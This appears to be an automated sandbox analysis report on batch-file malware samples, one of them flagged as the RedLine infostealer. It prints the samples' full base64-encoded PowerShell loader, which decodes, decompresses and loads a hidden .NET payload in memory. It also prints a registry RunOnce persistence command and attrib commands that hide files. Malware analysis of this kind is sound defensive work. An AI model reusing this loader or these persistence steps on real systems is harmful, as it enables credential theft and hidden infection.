Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 224 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 224 wrote to memory of 4888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 224 wrote to memory of 4888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 224 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
PID 224 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
PID 224 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1764 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 224 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 224 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 /d "C:\Users\Admin\AppData\Roaming\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe

C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe

"C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgACMAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAjACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\system32\attrib.exe

attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 101.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

memory/1764-6-0x000000007514E000-0x000000007514F000-memory.dmp

memory/1764-7-0x0000000004760000-0x0000000004796000-memory.dmp

memory/1764-8-0x0000000004DD0000-0x00000000053F8000-memory.dmp

memory/1764-9-0x0000000075140000-0x00000000758F0000-memory.dmp

memory/1764-10-0x0000000075140000-0x00000000758F0000-memory.dmp

memory/1764-11-0x0000000004C10000-0x0000000004C32000-memory.dmp

memory/1764-12-0x0000000004CC0000-0x0000000004D26000-memory.dmp

memory/1764-13-0x0000000005400000-0x0000000005466000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vl3b3ya.ubb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1764-23-0x00000000055F0000-0x0000000005944000-memory.dmp

memory/1764-24-0x0000000005B10000-0x0000000005B2E000-memory.dmp

memory/1764-25-0x0000000005B40000-0x0000000005B8C000-memory.dmp

memory/1764-26-0x0000000007250000-0x00000000078CA000-memory.dmp

memory/1764-27-0x0000000006040000-0x000000000605A000-memory.dmp

memory/1764-28-0x0000000006DD0000-0x0000000006F72000-memory.dmp

memory/1764-29-0x0000000006F70000-0x000000000706A000-memory.dmp

memory/1764-30-0x00000000060F0000-0x000000000610A000-memory.dmp

memory/1764-31-0x0000000007170000-0x0000000007202000-memory.dmp

memory/4904-32-0x0000000000400000-0x0000000000430000-memory.dmp

memory/4904-35-0x0000000075140000-0x00000000758F0000-memory.dmp

memory/4904-36-0x0000000005930000-0x0000000005ED4000-memory.dmp

memory/4904-37-0x0000000075140000-0x00000000758F0000-memory.dmp

memory/4904-38-0x00000000065D0000-0x0000000006662000-memory.dmp

memory/4904-39-0x00000000067B0000-0x00000000067BA000-memory.dmp

memory/1764-40-0x0000000075140000-0x00000000758F0000-memory.dmp

memory/4904-41-0x0000000006860000-0x00000000068B0000-memory.dmp

memory/4904-42-0x0000000006A80000-0x0000000006C42000-memory.dmp

memory/4904-43-0x0000000075140000-0x00000000758F0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 19:11

Reported

2024-11-09 19:14

Platform

win7-20240903-en

Max time kernel

119s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"

Signatures

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe

C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe

"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAG54KgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwBueCcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\system32\attrib.exe

attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

memory/2764-4-0x0000000074171000-0x0000000074172000-memory.dmp

memory/2764-5-0x0000000074170000-0x000000007471B000-memory.dmp

memory/2764-7-0x0000000074170000-0x000000007471B000-memory.dmp

memory/2764-8-0x0000000074170000-0x000000007471B000-memory.dmp

memory/2764-6-0x0000000074170000-0x000000007471B000-memory.dmp

memory/2764-9-0x0000000074170000-0x000000007471B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 19:11

Reported

2024-11-09 19:14

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

147s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3492 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3492 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
PID 3492 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
PID 3492 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3472 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3492 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3492 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe

C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe

"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAG54KgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwBueCcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHk